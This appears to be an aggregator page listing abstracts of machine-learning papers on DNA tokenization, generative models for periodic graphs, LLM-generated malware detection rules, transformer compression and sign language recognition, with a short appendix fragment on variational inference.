Goto

Collaborating Authors

 basic unit


Model Decides How to Tokenize: Adaptive DNA Sequence Tokenization with MxDNA

Neural Information Processing Systems

Foundation models have made significant strides in understanding the genomic language of DNA sequences. However, previous models typically adopt the tok-enization methods designed for natural language, which are unsuitable for DNA sequences due to their unique characteristics. In addition, the optimal approach to tokenize DNA remains largely under-explored, and may not be intuitively understood by humans even if discovered. To address these challenges, we introduce MxDNA, a novel framework where the model autonomously learns an effective DNA tokenization strategy through gradient decent.





A Derivation of variational inference

Neural Information Processing Systems

ELBO can be formulated into maximizing the objective of V AE as in Eq. (4). Based on the condition (i.e.subject to) of the loss function, we enforce z In total 3,780 MOFs were selected for the experiment. QMOF dataset was summarized in Appendix, Table 1. Meshes in MeshSeg dataset can be formed into graphs of triangle grids. The statistics of MeshSeg dataset has been summarized in Appendix, Table 1.


Deep Generative Model for Periodic Graphs

Neural Information Processing Systems

Their generative modeling has great potential in real-world applications such as material design and graphics synthesis. Classical models either rely on domain-specific predefined generation principles (e.g., in crystal net design),


Automatically Generating Rules of Malicious Software Packages via Large Language Model

Zhang, XiangRui, Chen, HaoYu, He, Yongzhong, Niu, Wenjia, Li, Qiang

arXiv.org Artificial Intelligence

Today's security tools predominantly rely on predefined rules crafted by experts, making them poorly adapted to the emergence of software supply chain attacks. To tackle this limitation, we propose a novel tool, RuleLLM, which leverages large language models (LLMs) to automate rule generation for OSS ecosystems. RuleLLM extracts metadata and code snippets from malware as its input, producing YARA and Semgrep rules that can be directly deployed in software development. Specifically, the rule generation task involves three subtasks: crafting rules, refining rules, and aligning rules. To validate RuleLLM's effectiveness, we implemented a prototype system and conducted experiments on the dataset of 1,633 malicious packages. The results are promising that RuleLLM generated 763 rules (452 YARA and 311 Semgrep) with a precision of 85.2\% and a recall of 91.8\%, outperforming state-of-the-art (SOTA) tools and scored-based approaches. We further analyzed generated rules and proposed a rule taxonomy: 11 categories and 38 subcategories.


Model Decides How to Tokenize: Adaptive DNA Sequence Tokenization with MxDNA

Qiao, Lifeng, Ye, Peng, Ren, Yuchen, Bai, Weiqiang, Liang, Chaoqi, Ma, Xinzhu, Dong, Nanqing, Ouyang, Wanli

arXiv.org Artificial Intelligence

Foundation models have made significant strides in understanding the genomic language of DNA sequences. However, previous models typically adopt the tokenization methods designed for natural language, which are unsuitable for DNA sequences due to their unique characteristics. In addition, the optimal approach to tokenize DNA remains largely under-explored, and may not be intuitively understood by humans even if discovered. To address these challenges, we introduce MxDNA, a novel framework where the model autonomously learns an effective DNA tokenization strategy through gradient decent. MxDNA employs a sparse Mixture of Convolution Experts coupled with a deformable convolution to model the tokenization process, with the discontinuous, overlapping, and ambiguous nature of meaningful genomic segments explicitly considered. On Nucleotide Transformer Benchmarks and Genomic Benchmarks, MxDNA demonstrates superior performance to existing methods with less pretraining data and time, highlighting its effectiveness. Finally, we show that MxDNA learns unique tokenization strategy distinct to those of previous methods and captures genomic functionalities at a token level during self-supervised pretraining. Our MxDNA aims to provide a new perspective on DNA tokenization, potentially offering broad applications in various domains and yielding profound insights.


SEE: Sememe Entanglement Encoding for Transformer-bases Models Compression

Zhang, Jing, Sun, Shuzhen, Zhang, Peng, Cao, Guangxing, Gao, Hui, Ma, Xindian, Xu, Nan, Hou, Yuexian

arXiv.org Artificial Intelligence

Transformer-based large language models exhibit groundbreaking capabilities, but their storage and computational costs are prohibitively high, limiting their application in resource-constrained scenarios. An effective approach is to eliminate redundant model parameters and computational costs while incorporating efficient expert-derived knowledge structures to achieve a balance between compression and performance. Therefore, we propose the \textit{Sememe Entanglement Encoding (SEE)} algorithm. Guided by expert prior knowledge, the model is compressed through the low-rank approximation idea. In Entanglement Embedding, basic semantic units such as sememes are represented as low-dimensional vectors, and then reconstructed into high-dimensional word embeddings through the combination of generalized quantum entanglement. We adapt the Sememe Entanglement Encoding algorithm to transformer-based models of different magnitudes. Experimental results indicate that our approach achieves stable performance while compressing model parameters and computational costs.


Stream State-tying for Sign Language Recognition

Ma, Jiyong, Gao, Wen, Wang, Chunli

arXiv.org Artificial Intelligence

It is a kind of visual language via hand and arm movements accompanying facial expression and lip motion. The facial expression and lip motion are less important than hand gestures in sign language, but they may help to understand some hand gestures. Digitized devices can be used to measure the temporal and spatial information of hand gestures, the typical devices are data gloves, position trackers. In this paper, we use two CyberGloves and a position tracker, i.e., Pohelmus 3SPACE with two receivers positioned on the wrist of each CyberGlove and one fixed at thorax as input devices to measure gestures. Chinese sign language is classified into two categories. One is hand gesture in which each gesture corresponds to a Chinese phrase. The other is fingerspelling in which each alphabet corresponds to a posture, and each Chinese sign corresponds to several postures performed continuously.